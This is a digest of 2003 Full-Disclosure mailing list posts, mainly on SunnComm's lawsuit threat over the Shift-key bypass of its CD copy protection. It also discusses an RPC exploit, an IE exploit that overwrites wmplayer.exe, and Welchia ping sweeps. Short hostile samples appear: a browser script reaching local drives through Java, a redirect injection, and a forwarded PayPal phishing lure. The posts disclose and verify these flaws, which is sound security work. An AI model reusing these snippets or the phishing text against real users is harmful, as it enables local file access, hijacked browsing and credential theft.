Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Nick Jacobsen wrote: it seems to me the perfect chance for a countersuit... cause at least as far as I know, most states' definition of computer crime would include installing software on a machine without the owner's permission or knowledge.. and since that is what SunnComm's protection is doing... According to the report, the software shows an EULA before the system is modified, so there is user consent. By the way, the subject line is misleading. SunnComm doesn't sue because of the shift key description (the company isn't *that* stupid), but because of the removal instructions for the Trojan Horse. These instructions could indeed be illegal to publish in the United States and other countries because they are specifically designed to circumvent an effective measure for restricting copies. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
It's funny how companies are running crazy, throwing lawsuits at anyone that proves that they are complete idiots! They might as well sue a whole group of companies for not implementing the autorun feature that automatically installs their protection driver to prevent anyone from copying the software (which can easily be disabled in less than 5 minutes). Hopefully, we won't get sued for knowing how to bypass the protection scheme... (You can read the paper in question at: http://www.cs.princeton.edu/~jhalderm/cd3/) Salutations, Johan Denoyer [EMAIL PROTECTED] Digital Connexion http://www.digital-connexion.info Richard M. Smith said: http://news.com.com/2100-1025_3-5089168.html?tag=nefd_top Student faces suit over key to CD locks Last modified: October 9, 2003, 2:01 PM PDT By John Borland Staff Writer, CNET News.com SunnComm Technologies, a developer of CD antipiracy technology, said Thursday that it will likely sue a Princeton student who early this week showed how to evade the company's copy protection by pushing a computer's Shift key. Princeton Ph.D. student John Alex Halderman published a paper on his Web site on Monday that gave detailed instructions on how to disarm the SunnComm technology, which aims to block unauthorized CD copying and MP3 ripping. The technology is included on an album by Anthony Hamilton that was recently distributed by BMG Music. On Thursday, SunnComm CEO Peter Jacobs said the company plans legal action and is considering both criminal and civil suits. He said it may charge the student with maligning the company's reputation and, possibly, with violating copyright law that bans the distribution of tools for breaking through digital piracy safeguards. We feel we were the victim of an unannounced agenda and that the company has been wronged, Jacobs said. I think the agenda is: 'Digital property should belong to everyone on the Internet.' I'm not sure that works in the marketplace. 
The cases are already being examined by some intellectual-property lawyers for their potential to test the extremes of a controversial copyright law that blocks the distribution of information or software that breaks or circumvents copy-protection technologies. Several civil and criminal cases based on the Digital Millennium Copyright Act have been filed against people who distributed information or software aimed at breaking through antipiracy locks. In one, Web publisher Eric Corley was banned by a federal judge from publishing software code that helped in the process of copying DVDs. In a criminal case, Russian company ElcomSoft was cleared of charges that it had distributed software that willfully broke through Adobe Systems' e-book copy protection. Both of those cases dealt with software or software code, however. The issue in Halderman's case is somewhat different. In his paper, published on the Princeton Web site on Monday, the student explained that the SunnComm technique relies on installing antipiracy software directly from the protected CD itself. However, this can be prevented by stopping Microsoft Windows' auto-run feature. That can be done simply by pushing the Shift key as the CD loads. If the CD does load and installs the software, Halderman identified the driver file that can be disabled using standard Windows tools. Free-speech activists said the nature of Halderman's instructions--which appeared in an academic paper, used only functions built into every Windows computer, and were not distributed for profit--meant they would not fall under DMCA scrutiny.
Re: [Full-Disclosure] Re: Do you really think CDs will be protected in future?
Phillip R. Paradis wrote: I agree that they do have a case. I think, however, their problems are entirely of their own creation. Yes. 2.) Offer added value. Good artists and managers have known this for a long time. People will more likely buy a record which also has nice artwork, exclusive content (maybe printed) or gives access to online content or such. True enough, though such things will get copied also. New Line Cinemas did something interesting with its Lord of the Rings movies; they released an extended version of the movie (on 5 DVDs) that also included (among other extras) a pair of miniature statues from the movie. This edition is a bit expensive, but copying it entirely is rather difficult. (If anyone disputes this, would they please email me a 5lb stone statue...) That's the kind of thing I had in mind. Some artists do and have done it well. Others have failed. Also do not forget that most copiers are not making a copy for you specifically, rather they make some good enough rips, but won't bother with niceties. That's the stuff you can then d/l from P2P networks. Often the rips weren't even proof-listened, since they contained cracks and other distortions :-) 3.) Offer digital downloads and on-demand CD generation. Quite often, I may want my personal Best of which is not the same as theirs. Or I may want individual tracks. The price should be reasonable, of course. The price should be free, if you can show that you have purchased CDs which already contain those tracks. US Copyright law provides for fair use; making copies of a work for your own use certainly qualifies as fair use. Why then, should I be forced to pay an additional fee for a right I am supposedly given by law? Yes. But I had in mind that these opportunities should also exist if I do not yet have that music. E.g. I see a Best of by one of my favourite artists, but not all songs that I like are there. 
Then I should have the option of creating a personal Best of CD, which then can be delivered to me in physical format or made available as a download per track. If prices were reasonable for this, sales would go up I think. Agreed, for the most part. As I work for a retailer, however, I know that what consumers think is irrelevant to the record folks. The retailer I work for has an agreement with its suppliers such that once a customer opens a CD (or DVD, VHS tape, software package, etc) they cannot return it, unless the media is defective, in which case they get another copy of the same product only. So if your newly purchased CD is copy protected and won't play in your CD player, you're stuck with it anyway, unless you want to get another copy of the same useless disc. As others have pointed out, this is not so simple. If there is no labeling, the goods could be deemed defective. In fact, they already have been in several cases in Europe. Since consumer-protection legislation is quite strong here, that would only leave the retailer hanging, but not the customer. Of course, if the disc does not claim to be an audio CD (no Compact Disc logo) and has clear and understandable language on the outside to tell you what's up (I have seen some attempts at this already) in the customer's native tongue (not only in English), then the defective argument probably no longer holds. I still think that copy-protection is bad for business reasons, though, and this is why it should be dropped. IMHO it hurts sales. E.g. I for sure haven't bought a single copy-protected title yet and will continue to do so, although this meant that some of my favourites remained on the shelf. And since we all know that it doesn't really stop copying either, it is fairly pointless, at least imho. 
(not even digital copying, although this was not mentioned here; there are quite a few drives that actually have firmware to circumvent it, and I am yet to see armed police burst into the local Media Markt to confiscate e.g. all recent Plextor CD-RW drives as circumvention tech...) Enough of me (although I really think about publishing a Best of FD CD with some cute posts on it and making it a smash hit, without copy protection, but *with* nice hardcopy pix of some of the participants. It could also include remixes of some posts :-P ) Sz.
Re: [Full-Disclosure] a stupid bug ...that works on mozilla, opera, IE
bipin gautam wrote: I have successfully tried this in the latest version of Opera and IE 6 and Mozilla. What do you say??? Does not work with Mozilla 1.4 under WinXP (patched up-to-date). Jan Wildeboer
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Apple is even worse than Linux: because of its print-to-PDF from any application you're able to change the permissions on any PDF (including copy permission ;-) cheerio -- Jeremiah Cornelius wrote: Apple and Linux are 'circumvention devices'!
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Okay... So according to the law it's illegal to remove the program if later you decide not to agree to the EULA? (Which I'm sure says that the terms can be changed at any time within it.) That sure doesn't seem kosher to me... I feel that you should be able to remove/disable whatever on your computer. According to this logic... Using Ad-Aware is illegal because it removes spyware from your system without their non-existent uninstall interface! Oh, and you're also not allowed to know what the file/driver name of the program that they've installed is either? Nice! -Original Message- From: [EMAIL PROTECTED] [mailto:full-disclosure- [EMAIL PROTECTED] On Behalf Of Florian Weimer Sent: Thursday, October 09, 2003 23:52 To: Nick Jacobsen Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m Nick Jacobsen wrote: it seems to me the perfect chance for a countersuit... cause at least as far as I know, most states' definition of computer crime would include installing software on a machine without the owner's permission or knowledge.. and since that is what SunnComm's protection is doing... According to the report, the software shows an EULA before the system is modified, so there is user consent. By the way, the subject line is misleading. SunnComm doesn't sue because of the shift key description (the company isn't *that* stupid), but because of the removal instructions for the Trojan Horse. These instructions could indeed be illegal to publish in the United States and other countries because they are specifically designed to circumvent an effective measure for restricting copies.
RE: [Full-Disclosure] MS RPC remote exploit.
From my cursory look at the code (/me is a C rookie), it seems that it only affects w2k and winXP; does anyone know of any exploit that targets NT4??? Given that question, how hard would it be to code in NT4 functionality?? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse Sent: 09 October 2003 14:27 To: 'Sudharsha Wijesinghe'; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] MS RPC remote exploit. Hi, Systems already updated are not vulnerable to this exploit. The new code is simply improved and is now more universal. It doesn't make use of static addresses for jumps, which makes the improved code much more dangerous since it will be effective on a large range of different vulnerable Microsoft Windows operating systems. Kind regards, Peter Kruse CSIS / Kruse Security ApS http://www.krusesecurity.dk - www.csis.dk -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Sudharsha Wijesinghe Sent: 9 October 2003 14:42 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MS RPC remote exploit. According to MS there can't be any remote exploit on MS RPC except for a DoS attack using 139/135/445. However, the code is available for a shell code. Has anyone tried this exploit? Sudharsha
Re: [Full-Disclosure] Student faces suit over key to CD locks
On Thu, 2003-10-09 at 23:54, Richard M. Smith wrote: http://news.com.com/2100-1025_3-5089168.html?tag=nefd_top Student faces suit over key to CD locks [snip] In his paper, published on the Princeton Web site on Monday, the student explained that the SunnComm technique relies on installing antipiracy software directly from the protected CD itself. However, this can be prevented by stopping Microsoft Windows' auto-run feature. That can be done simply by pushing the Shift key as the CD loads. Don't news.com.com, theregister.co.uk, full-disclosure, Richard M. Smith, I and everyone else simply by citing these articles violate the DMCA? Actually, I don't have to read the student's paper anymore to learn how to circumvent SunnComm's audio CD protection - reading some news report about the issue suffices. So, everybody telling others how this protection can be circumvented could theoretically be sued under US law. Europe seemed to be safe against these perversions, but Germany has recently adopted a DMCA-like law. In fact, every member of the EU will have to adopt the European Union Copyright Directive [1]. However, these things were not invented in Brussels; it is solely the adoption of the WIPO Copyright Treaty from December 1996 [2,3]. regards nicola [1] http://wiki.ael.be/index.php/EUCD-Status [2] http://www.eurorights.org/eudmca/index.html [3] http://www.wipo.int/treaties/ip/wct/index.html
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Florian Weimer wrote: By the way, the subject line is misleading. SunnComm doesn't sue because of the shift key description (the company isn't *that* stupid), but because of the removal instructions for the Trojan Horse. These instructions could indeed be illegal to publish in the United States and other countries because they are specifically designed to circumvent an effective measure for restricting copies. as would use of a recovery disk set (supplied with most PCs), as it would almost as a side effect remove any trojans :)
Re: [Full-Disclosure] Student faces suit over key to CD locks
In his paper, published on the Princeton Web site on Monday, the student explained that the SunnComm technique relies on installing antipiracy software directly from the protected CD itself. However, this can be prevented by stopping Microsoft Windows' auto-run feature. That can be done simply by pushing the Shift key as the CD loads. Do not news.com.com, theregister.co.uk, full-disclosure, Richard M. Smith, me and everyone simply by citing these articles violate the DMCA? Actually, I don't have to read the student's paper anymore to learn how to circumvent SunnComm's audio CD protection - reading some news report about the issue suffices. lmfao, perfectly stated, and neither do another billion people who will read, or heaven forbid hear it on the radio or see it on TV.. the information is now in the public domain... being exactly told the method of circumvention in the media / news description and subsequent article.. http://www.cnn.com/2003/TECH/ptech/10/08/bmg.protection.reut/ http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=suncomm+shift+key&btnG=Google+Search LOL rofl HAAHHAHAHa Donnie Werner E2 Labs http://e2-labs.com
[Full-Disclosure] Opera/Netscape/Mozilla: Floppy access from untrusted java applet
Hi, just put the floppy reading Java call in an applet for those who think the problem has nothing to do with Java. The problem is that the sandbox should protect the system from untrusted access to system resources, such as a floppy drive. But again, like many things in the JDK (see illegalaccess.org for details), this does not work as printed in the Java specification. You can try the new floppy applet at: http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html Tested on: - IE 6 - Opera 7.2 - Netscape on Win32... Warning: The applet may start an alert message to enter a floppy disk; if this [your own!] disk is infected by a virus, it may damage your PeeCee. But the applet itself is plain Java, no disk virus included! Marc -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -- Forwarded message -- Date: Wed, 8 Oct 2003 00:08:33 +0200 (MES) From: Marc Schoenefeld [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Opera/Netscape/Mozilla: Floppy access from liveconnect html page (fwd) Hi, just tried the following html page in Opera 7.2 / Netscape 7.2 / Mozilla on Windows and I was prompted with an insert floppy prompt box. The page was uploaded to a remote site and loaded from there. <script> a=Packages.org.apache.crimson.tree.XmlDocument.createXmlDocument("file:///a:/"); </script> Can anybody try this please to verify the issue? Instead of a: you could also please try com1/lpt1/prn/aux/clock$. My Java version is the jdk 1.4.2_01 browser plugin. Thanks Marc -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer [ PGP Signature ok - Wed Oct 8 00:07:59 MES 2003 ]
Re: [Full-Disclosure] !A stupid bug ...that works on mozilla, opera, IE!
Hi! On Thu, Oct 09, 2003 at 06:04:00PM -0500, Wayne Schroeder wrote: I don't know sport... I think you need to double check your "s and look again. The JavaScript console is just bitching on my Mozilla saying that the alert function isn't finished with a ) correctly. Also note that using the sequence </ within a script block will be treated as end-of-script. Quoting from http://www.w3.org/TR/html4/types.html#type-cdata: -- snip -- Although the STYLE and SCRIPT elements use CDATA for their data model, for these elements, CDATA must be handled differently by user agents. Markup and entities must be treated as raw text and passed to the application as is. The first occurrence of the character sequence "</" (end-tag open delimiter) is treated as terminating the end of the element's content. In valid documents, this would be the end tag for the element. -- snap -- Thus, even with correct quotes, the JavaScript code will be considered finished at the first </script, even though it's within quotes (the browser must not interpret the script code when looking for the end tag). The remaining ")</script> is then displayed as ") in the browser window. Note that it gets displayed in the document, not in an alert box (which the original post was suggesting). Furthermore, you'll get a JavaScript error, as the actual script code seen by the engine is alert("<script>location.href="http://www.ysgnet.com"; which is invalid - so no alert box at all. Ciao Thomas
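The tokenizer rule Thomas quotes is also why untrusted data dropped into an inline script is an XSS vector: the HTML parser ends the element at the first "</script" it sees, without ever parsing the JavaScript, so string quoting offers no protection. The following is an added example, not code from the original thread; the `renderUnsafe`/`renderSafe` template functions and the attacker-controlled profile value are constructed for illustration.

```javascript
// Added example, not code from the original thread. Models the rule quoted from
// HTML 4: the body of an inline <script> ends at the first "</" (browsers in practice
// look for "</script"), found by the HTML tokenizer without parsing the JavaScript,
// so a "</script" inside a JS string literal still ends the element.

// Return the bodies of all <script> elements the way a tokenizer sees them.
// Assumes bare "<script>" open tags (no attributes) to keep the example short.
function scriptBodies(html) {
  const lower = html.toLowerCase();
  const bodies = [];
  let pos = 0;
  for (;;) {
    const open = lower.indexOf("<script>", pos);
    if (open === -1) break;
    const start = open + "<script>".length;
    const end = lower.indexOf("</script", start); // no JS parsing: quotes are irrelevant
    bodies.push(end === -1 ? html.slice(start) : html.slice(start, end));
    if (end === -1) break;
    pos = end + "</script".length;
  }
  return bodies;
}

// Hypothetical server-side template that embeds a JSON value in an inline script.
// Unsafe: JSON.stringify does not escape "<", so a value containing "</script>"
// ends the element early and whatever follows is parsed as new markup.
function renderUnsafe(profile) {
  return "<html><body><script>var profile = " + JSON.stringify(profile) +
         ";</script></body></html>";
}

// Hardened: escape "<", ">", "&" and the JS line terminators U+2028/U+2029 as
// \uXXXX. The result is still valid JSON and valid JavaScript, but can no longer
// contain "</script" or "<!--", so the tokenizer cannot be made to close the element.
function jsonForInlineScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderSafe(profile) {
  return "<html><body><script>var profile = " + jsonForInlineScript(profile) +
         ";</script></body></html>";
}

// What would the first script body actually execute? Returns the profile object if
// the body is still the single intended statement, or null if it was cut short.
function recoverProfile(html) {
  const body = scriptBodies(html)[0] || "";
  const m = /^var profile = ([\s\S]*);$/.exec(body);
  if (!m) return null;
  try { return JSON.parse(m[1]); } catch (e) { return null; }
}

// Constructed attacker-controlled input (a display name containing a closing tag).
const evilProfile = { name: "Mallory</script><script>alert(document.cookie)</script>" };

console.log(scriptBodies(renderUnsafe(evilProfile))); // two scripts: truncated + injected
console.log(scriptBodies(renderSafe(evilProfile)));   // one script, intact
```

With the unsafe template the first script body is cut off at "Mallory" and the attacker's second `<script>` block becomes a real element; with the `\u003c` escaping the whole statement survives and `JSON.parse` returns the original name, so the data round-trips without ever containing a tag the tokenizer could act on.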
[Full-Disclosure] Re: Strange from address
Hi James, If you insert the following string into the mail from: field [EMAIL PROTECTED] it appears to bypass the MX check and replies OK. If you read the qmail manpages (addresses(5) specifically), you can see that this is a qmail extension: this is the envelope sender of a double bounce. What I fail to see, however, is how it can be a security problem. It is not very difficult to generate envelope senders that pass your MX check anyway. Regards, Akos -- Akos Szalkai [EMAIL PROTECTED] IT Consultant, CISA 2F 2000 Szamitastechnikai es Szolgaltato Kft. Tel: (+36-1)-4887700 Fax: (+36-1)-4887709 WWW: http://www.2f.hu/
[Full-Disclosure] RE: Increased TCP 139 Activity
Ron Dufresne wrote: If this is indeed the case, the ping sweep will all be packets of 92 bytes; these are Windows packets, and the recent rpcdcom sploits are the culprit. ICMP packets 92 bytes in size (72 bytes + 20 bytes for header) are usually due to a Welchia-infected host trying to propagate. It is not an rpcdcom exploit. V/r, Sung J. Choe PACAF CSS/SCHP, PACAF NOSC Information Assurance Analyst DSN: 315-449-4317, Comm: 808-449-4317
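As an added example (not from the original post), here is detection logic for the pattern Sung describes: a host sending many fixed-size 92-byte ICMP echo requests to many distinct destinations in a short time. The capture lines are constructed in tcpdump's ICMP style; the exact line format, the addresses and the thresholds are assumptions of this example, not of the thread.

```javascript
// Added example, not code from the original post. Flags hosts that look like a
// Welchia/Nachi ping sweep: many ICMP echo requests of one fixed size (ICMP length 72,
// i.e. 92 bytes on the wire with a 20-byte IPv4 header) to many distinct destinations
// in a short time. Lines are constructed in tcpdump's ICMP style; the exact format
// below is an assumption of this example:
//   "HH:MM:SS.ffffff IP <src> > <dst>: ICMP echo request, id <n>, seq <n>, length <icmp_len>"
// For comparison, a default Windows ping carries 32 bytes of data (ICMP length 40)
// and a default Linux ping 56 bytes (ICMP length 64), so 72 stands out.

const ECHO_LINE =
  /^(\d\d):(\d\d):(\d\d(?:\.\d+)?) IP (\S+) > (\S+): ICMP echo request, id \d+, seq \d+, length (\d+)$/;

function parseEchoRequest(line) {
  const m = ECHO_LINE.exec(line);
  if (!m) return null;
  const t = Number(m[1]) * 3600 + Number(m[2]) * 60 + Number(m[3]);
  const icmpLen = Number(m[6]);
  return { t, src: m[4], dst: m[5], icmpLen, wireLen: icmpLen + 20 };
}

// Per source, count distinct destinations hit with wireLen-byte echo requests inside
// any sliding window of windowSec seconds; alert when that reaches minTargets.
function detectSweeps(lines, { wireLen = 92, windowSec = 10, minTargets = 16 } = {}) {
  const bySrc = new Map();
  for (const line of lines) {
    const p = parseEchoRequest(line);
    if (!p || p.wireLen !== wireLen) continue;
    if (!bySrc.has(p.src)) bySrc.set(p.src, []);
    bySrc.get(p.src).push(p);
  }
  const alerts = [];
  for (const [src, pkts] of bySrc) {
    pkts.sort((a, b) => a.t - b.t);
    const inWindow = new Map(); // dst -> number of packets currently inside the window
    let lo = 0, best = 0;
    for (let hi = 0; hi < pkts.length; hi++) {
      inWindow.set(pkts[hi].dst, (inWindow.get(pkts[hi].dst) || 0) + 1);
      while (pkts[hi].t - pkts[lo].t > windowSec) {
        const d = pkts[lo].dst, c = inWindow.get(d) - 1;
        if (c === 0) inWindow.delete(d); else inWindow.set(d, c);
        lo++;
      }
      best = Math.max(best, inWindow.size);
    }
    if (best >= minTargets) alerts.push({ src, distinctTargets: best, packets: pkts.length });
  }
  return alerts;
}

// Constructed capture: one host sweeping 10.0.5.1-40 with 92-byte pings, a normal
// Windows ping, a normal Linux ping, a host sending 92-byte pings to only two
// targets, and an echo reply that the parser must ignore.
function ts(sec) {
  const s = Math.floor(sec), frac = Math.round((sec - s) * 1e6);
  return "10:42:" + String(s).padStart(2, "0") + "." + String(frac).padStart(6, "0");
}
function echo(t, src, dst, seq, icmpLen) {
  return `${ts(t)} IP ${src} > ${dst}: ICMP echo request, id 512, seq ${seq}, length ${icmpLen}`;
}
function sampleCapture() {
  const lines = [];
  for (let i = 1; i <= 40; i++) lines.push(echo(1 + i * 0.05, "10.0.4.17", "10.0.5." + i, i, 72));
  for (let i = 1; i <= 4; i++) lines.push(echo(1 + i, "10.0.4.20", "10.0.5.1", i, 40));
  for (let i = 1; i <= 3; i++) lines.push(echo(2 + i, "10.0.4.21", "10.0.5.2", i, 64));
  for (let i = 1; i <= 6; i++) lines.push(echo(3 + i * 0.5, "10.0.4.22", "10.0.5." + (2 + (i % 2)), i, 72));
  lines.push("10:42:09.000000 IP 10.0.4.23 > 10.0.5.9: ICMP echo reply, id 512, seq 1, length 72");
  return lines.sort();
}

console.log(detectSweeps(sampleCapture()));
```

Keying on packet size alone is not enough (a single administrator pinging one box with `-l 64` would also produce 92-byte packets); the distinct-destination count inside the window is what separates a propagating worm from a normal ping, which is why the host hitting only two targets is not reported at the default threshold.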
Re: [Full-Disclosure] Re: Do you really think CDs will be protected in future?
Alan said: The whole question really comes down to this: warranty of merchantability definition - a warranty of merchantability simply guarantees that goods sold are fit for the ordinary purpose for which the goods were sold... This is a general rule of fairness that what looks like a carton of milk in the supermarket dairy case really is drinkable milk and not sour or unusable. Damn it. There goes my business plan of selling Golden Poison Frogs in a container indistinguishable from a bag of Oreos. I think the real problem lies with the concept of hand-me-down Acceptable Use Policies / Licence Agreements -- that a party completely removed from a retail environment might be able to dictate conditions of a sale (and in some cases, resale!) Although I'll readily admit that some restrictions may be reasonable, they shouldn't be entirely up to the supplier/manufacturer. C
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Okay... So according to the law it's illegal to remove the program if later you decide not to agree to the EULA? (Which I'm sure says that the terms can be changed at any time within it.) That sure doesn't seem kosher to me... I feel that you should be able to remove/disable whatever on your computer. According to this logic... Using Ad-Aware is illegal because it removes spyware from your system without their non-existent uninstall interface! Oh, and you're also not allowed to know what the file/driver name of the program that they've installed is either? Nice! Hi Poof, Odds are the copy-protection-related drivers can be removed via Windows' Add/Remove Programs control panel applet -- rendering your 'protected' media a de facto coaster until you accept the EULA a second time. C
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Did anyone sue Sharpie when it was found that a black magic marker would defeat Sony copy protection? - Original Message - From: Adam Dyga [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 6:09 PM Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m On Friday 10 October 2003 00:08, Jeremiah Cornelius wrote: | Ahhh... The wildest, satirical speculations on FullDisclosure come to | fruition in a court of law. Let the games begin! | | http://www.theregister.co.uk/content/6/33322.html | SunnComm to sue 'Shift key' student for $10m | By Tony Smith | Posted: 09/10/2003 at 20:47 GMT | | | SunnComm has threatened Princeton PhD student Alex Halderman with the | Digital Millennium Copyright Act (DMCA) for exposing a key weakness in the | company's latest CD copy protection technology, MediaMax CD3. | How stupid they are; didn't they think of operating systems other than Windows that don't have something like the Autorun feature? -- Greets adeon
RE: [Full-Disclosure] Student faces suit over key to CD locks
snip On Thursday, SunnComm CEO Peter Jacobs said the company plans legal action and is considering both criminal and civil suits. He said it may charge the student with maligning the company's reputation and, possibly, with violating copyright law that bans the distribution of tools for breaking through digital piracy safeguards. snip Correct me if I'm wrong, but how is holding down the shift key distributing tools for breaking through digital piracy safeguards? Shouldn't the keyboard manufacturers be sued since they are the ones that made the shift key and distributed it? Jonathan
RE: [Full-Disclosure] Internet Explorer (BAN IT !!!)
Yup that's true, the exploit actually didn't work even if I was logged in as Administrator or a normal user in Windows XP SP1 with all patches installed except 811394. Regards, Syed Imran Ali Senior Network Engineer (T) +92-300-9256202 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gregh Sent: Friday, October 10, 2003 3:07 AM To: Irwan Hadi Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) - Original Message - From: Irwan Hadi [EMAIL PROTECTED] To: gregh [EMAIL PROTECTED] Cc: Stephen [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 3:55 PM Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote: - Original Message - From: Stephen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 5:19 AM Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!) It becomes really dangerous to use IE ... http://www.k-otik.com/WMPLAYER-TEST/ God bless Mozilla http://www.mozilla.org/ Your test didn't work on my IE SP1 under XP with all patches excepting 811394. Absolutely no effect on WMP. My original WMP remains and works. It depends whether you were logged in as a privileged user or not. 
If not, then your browser can't delete the wmplayer.exe file, because the only user that can change/delete the wmplayer.exe file is a privileged user.

C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe
C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
                                              BUILTIN\Power Users:C
                                              BUILTIN\Administrators:F
                                              NT AUTHORITY\SYSTEM:F

C:\PROGRA~1\Windows Media Player>

The problem is just that too many people are running their Windows with full privileges. Didn't matter what I logged in as. I normally am ADMIN, naturally, but a privileged user, a very limited user - no difference. The exploit didn't work. Greg.
[Full-Disclosure] [Fwd: PayPal Account Security Measures]
great work, looks very real. Alejandro Mery ---BeginMessage--- Title: PayPal Please verify your information today! Dear Paypal Member. Your account has been randomly flagged in our system as a part of our routine security measures. This is a must to ensure that only you have access and use of your paypal account and to ensure a safe Paypal experience. We require all flagged accounts to verify their information on file with us. To verify your information, click here and enter the details requested. After you verify your information, your account shall be returned to good standing and you will continue to have full use of your account. Thank you for using PayPal! Please do not reply to this e-mail. Mail sent to this address cannot be answered. ---End Message---
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
I'm not a legal expert, but IIRC, Brown vs. Rural Telephone Company ruled that it was not a violation of any copyright to publish information that belonged to another company... although the issues are slightly different here, I think the same basis could apply if SunnComm were to suggest that the information published by the student was breaking some type of intellectual property rights or such.
Re: [Full-Disclosure] [Fwd: PayPal Account Security Measures]
This has been going around for at least a few months
Re: [Full-Disclosure] Microsoft Outlines New Initiatives in Ongoing Security Efforts To Help Customers
On Thu, 9 Oct 2003 12:50:37 -0500 Dehner, Benjamin T. [EMAIL PROTECTED] wrote: What is interesting in this article is what Ballmer does NOT say. Specifically: -- code auditing to prevent security problems -- Q/A testing of software to detect bugs -- testing of patches to prevent patch interaction and over-write issues -- third party security testing This was tru$tworthy computing part 1, and it failed miserably. georgi
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
just looked at it, the authors messed up, so no it shouldn't work, it doesn't work here. they didn't get that error.jsp is a java server page (something roughly equivalent to asp and php) that sets the response code to something that triggers the res file to be loaded

--jelmer

- Original Message -
From: Syed Imran Ali [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 12:02 PM
Subject: RE: [Full-Disclosure] Internet Explorer (BAN IT !!!)

> Yup that's true, the exploit actually didn't work even if I was logged in as Administrator or a normal user in Windows XP SP1 with all patches installed except 811394.
>
> Regards,
> Syed Imran Ali
> Senior Network Engineer
> (T) +92-300-9256202
>
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gregh
> Sent: Friday, October 10, 2003 3:07 AM
> To: Irwan Hadi
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
>
> - Original Message -
> From: Irwan Hadi [EMAIL PROTECTED]
> To: gregh [EMAIL PROTECTED]
> Cc: Stephen [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Sent: Thursday, October 09, 2003 3:55 PM
> Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
>
> > On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote:
> > > - Original Message -
> > > From: Stephen [EMAIL PROTECTED]
> > > To: [EMAIL PROTECTED]
> > > Sent: Thursday, October 09, 2003 5:19 AM
> > > Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!)
> > >
> > > > It becomes really dangerous to use IE ...
> > > > http://www.k-otik.com/WMPLAYER-TEST/
> > > > God bless Mozilla http://www.mozilla.org/
> > >
> > > Your test didn't work on my IESP1 under XP with all patches excepting 811394. Absolutely no effect on WMP. My original WMP remains and works.
> >
> > It depends whether you were logging as a privileged user or not. If not, then your browser can't delete the wmplayer.exe file, because the only user that can change/delete the wmplayer.exe file is privileged user.
> >
> >     C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe
> >     C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
> >                                                   BUILTIN\Power Users:C
> >                                                   BUILTIN\Administrators:F
> >                                                   NT AUTHORITY\SYSTEM:F
> >     C:\PROGRA~1\Windows Media Player>
> >
> > The problem is just too many people are running their Windows with Full Privileges.
>
> Didn't matter what I logged in as. I normally am ADMIN, naturally, but a privileged user, a very limited user - no difference. The exploit didn't work.
>
> Greg.
RE: [Full-Disclosure] Student faces suit over key to CD locks
Does this mean they're going to attempt to sue Microsoft also, for publishing this feature in their Windows documentation? Or perhaps they'll take the RIAA's approach and sue anyone who uses the SHIFT key.
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
jelmer wrote:

> just looked at it, the authors messed up, so no it shouldn't work, it doesn't work here. they didn't get that error.jsp is a java server page (something roughly equivalent to asp and php) that sets the response code to something that triggers the res file to be loaded

The exploit worked fine here on an XP Home machine with all patches and the latest version of I.E. I changed the executable that ran to ipconfig.exe so I knew what would be running on my computer. I could see the window open, saw the output of ipconfig.exe flash by, and the wmplayer.exe file was replaced by the contents of ipconfig.exe.

If the IE configuration was changed to disallow opening content in the media bar, then the error.jsp page was called which resulted in a 404. I cannot say for certain that ipconfig.exe did not run but I didn't see it and the wmplayer.exe file was unchanged. Similar results were seen logging in as a non administrator user account. The I.E. configuration change is shown here:

http://www.jmu.edu/computing/security/info/iebug.shtml

I am not familiar enough with the exploit mechanisms to determine how effective this is but I suspect not very except against the script kiddies that will cut and paste the posted exploit.

--
Gary Flynn
